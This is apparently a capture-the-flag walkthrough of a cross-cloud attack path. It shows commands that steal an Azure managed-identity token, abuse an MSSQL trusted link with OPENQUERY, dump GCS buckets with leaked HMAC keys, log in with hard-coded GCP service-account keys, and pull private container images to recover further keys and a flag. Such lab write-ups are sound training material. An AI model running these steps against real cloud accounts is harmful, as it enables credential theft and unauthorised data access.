Crossing the great divide

Solve

Within the same zip file, there's an initial-config.sql file. It contains another set of credentials, which we can add to our loot.

initial-config.sql

From our prior enumeration, we know that the virtual machine has a system-assigned managed identity. Let's try to dump a token for it.

Get-ChildItem env:
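Among these, the variables that matter are the managed identity endpoint and its secret header. A minimal filter, assuming the MSI_*/IDENTITY_* naming Azure uses for its managed identity endpoints:

# Show only the managed-identity-related variables
Get-ChildItem env: | Where-Object { $_.Name -match 'IDENTITY|MSI' }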

With the identity endpoint and the secret header value, we can curl the endpoint to obtain a token for the management API.

curl "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: 41F02D3D5B464799867FCD3897A16785"
Retrieving access token
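The response is JSON; if jq is available, the bearer token can be pulled straight out of it (the endpoint, port, and secret are the ones recovered above):

# Request a management-plane token and keep only the access_token field
TOKEN=$(curl -s "http://127.0.0.1:41041/msi/token/?resource=https://management.azure.com/&api-version=2017-09-01" -H "Secret: 41F02D3D5B464799867FCD3897A16785" | jq -r '.access_token')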

With the access token, let's connect to Azure and enumerate the available resources.

Connecting to Az with the access token
Listing Az Resources
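The screenshots boil down to roughly the following Az PowerShell calls (a sketch assuming the token from the previous step is in $token; the account ID is a placeholder):

# Authenticate to Azure using only the stolen access token
Connect-AzAccount -AccessToken $token -AccountId "<placeholder-account-id>"
# Enumerate every resource this identity can see
Get-AzResource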

From the Get-AzResource output, we can see that there's a virtual machine running. Let's enumerate it further.

Get-AzVM

Next, let's get the public IP address of the virtual machine and attempt to authenticate to it.

Get-AzPublicIpAddress -ResourceGroupName SQLANALYSIS02_GROUP
nmap scan
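A straightforward service scan is enough here (<vm-public-ip> stands in for the address returned by Get-AzPublicIpAddress):

# Version-detect the exposed services, skipping host discovery
nmap -Pn -sV <vm-public-ip>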

From the nmap output, we can see that port 1433 is open, with MS SQL running on it. Let's use Impacket's mssqlclient to authenticate with the credentials we have.
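A typical invocation looks like this (the username and password are the ones from initial-config.sql, shown here as placeholders; mssqlclient.py uses SQL authentication by default):

# Authenticate to MSSQL on the Azure VM with the recovered credentials
mssqlclient.py '<username>:<password>@<vm-public-ip>'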

While enumerating the SQL server, I noticed that there is a trusted link (a linked server) configured.

trusted link
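The link can be confirmed from the SQL shell with standard MSSQL introspection (recent versions of Impacket's mssqlclient also ship an enum_links helper):

-- List configured linked/remote servers
EXEC sp_linkedservers;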

Referring to PayloadsAllTheThings, let's attempt to exploit the trusted link.

Attempting to select the version on the server at 34.74.254.28
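Reconstructed from the screenshot caption, the test query follows the usual PayloadsAllTheThings OPENQUERY pattern:

-- Execute a query on the linked server and return its version string
SELECT version FROM OPENQUERY("34.74.254.28", 'SELECT @@version AS version');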

Now that we've established access to the second SQL server via the trusted link, let's enumerate it as well.

SELECT * FROM OPENQUERY("34.74.254.28", 'SELECT table_name FROM bulkimport.INFORMATION_SCHEMA.TABLES WHERE table_type = ''BASE TABLE''');
Selecting the table names
SELECT COLUMN_NAME FROM OPENQUERY([34.74.254.28], 'SELECT COLUMN_NAME FROM bulkimport.INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = ''myqueries''');
Getting the column names
SELECT * FROM OPENQUERY([34.74.254.28], 'SELECT queries FROM [bulkimport].[dbo].[myqueries]');
Output of myqueries

From the output, we can see a reference to Google Cloud Storage. GCS offers interoperability with the Amazon S3 API, so let's use s3cmd to dump the files from the buckets.

First, we configure the .s3cfg file with the following data.

.s3cfg file
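The essential settings point s3cmd at GCS's S3-compatible endpoint; the HMAC key pair below is a placeholder for the credentials pulled from the database:

[default]
# HMAC credentials recovered from the myqueries output (placeholders)
access_key = <gcs-hmac-access-key>
secret_key = <gcs-hmac-secret-key>
# GCS interoperability endpoint
host_base = storage.googleapis.com
host_bucket = storage.googleapis.com
use_https = True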

We can then use s3cmd to interact with GCS as if it were a normal S3 bucket.

Listing buckets

From manual enumeration, only the mp-bulk-insert and gcf-v2-sources-454107766132-us-central1 buckets contain files. Let's download and inspect the data, as sketched below.
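Pulling everything down is two recursive gets (bucket names as listed above):

# List all buckets visible to these credentials
s3cmd ls
# Mirror the two non-empty buckets locally
s3cmd get --recursive s3://mp-bulk-insert/
s3cmd get --recursive s3://gcf-v2-sources-454107766132-us-central1/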

Looking at bulkinsert.bcp and bulkinsert.fmt, they contain the format specification for the data to be bulk-inserted, as well as some PII.

Next, looking at the zip files, unzipping them shows that they both contain the same file.

Looking at the source code, it is probably a Google Cloud Functions application, and it contains hard-coded service account credentials.

main.py

Let's copy out the service account JSON, save it as analysis.json, and authenticate with it.
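Authenticating with a key file is a one-liner:

# Log the gcloud CLI in as the leaked service account
gcloud auth activate-service-account --key-file=analysis.json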

I will be using the tool Bruteforce-GCP-Permissions to enumerate our permissions.

From the output, it seems like analysis has a lot of permissions over Artifact Registry. Artifact Registry is basically a container registry similar to Docker Hub, but hosted on GCP.

Listing the repositories

gcloud artifacts repositories list

Listing the images in the mp-default repository

gcloud artifacts docker images list us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default

Configuring Docker to authenticate to the Artifact Registry.

gcloud auth configure-docker us-east1-docker.pkg.dev

Pulling the Docker image

docker pull us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e

Next, we run the container interactively to enumerate its filesystem.

docker run -it us-east1-docker.pkg.dev/mp-proj-1-413623/mp-default/mp-seave@sha256:fc131d02bd19913bd3cbafc7c5d66c27af674ed99ea5a6c1522cca25075c417e /bin/bash
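Once inside, a quick sweep for key material narrows things down (a generic search, not specific to this image):

# Hunt for service account keys and list the promising directories
find / -name '*.json' 2>/dev/null | grep -v -E '^/(usr|proc|sys)'
ls -la /app /root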

Looking at the /app directory, there is another service account JSON, this time for the automation service account.

automation service account

Looking at the /root directory, we are able to retrieve the flag.

TLDR

  • Retrieve a DB password from initial-config.sql

  • Get an access token for the system-assigned managed identity

  • Enumerate Azure resources

  • Identify that there is a virtual machine running and retrieve its public IP address

  • Run nmap to identify open ports and services

  • Use Impacket's mssqlclient to authenticate with the credentials from initial-config.sql

  • Abuse the trusted link to access another database on 34.74.254.28

  • Retrieve the GCS credentials from the database on 34.74.254.28

  • Authenticate to GCS and dump the files using s3cmd

  • Authenticate to gcloud with the analysis service account JSON

  • Brute-force permissions using Bruteforce-GCP-Permissions

  • Identify that analysis has access to GCP Artifact Registry

  • Enumerate and pull Docker images from the Artifact Registry

  • Retrieve the automation service account JSON from the /app directory

  • Get the flag from the /root directory
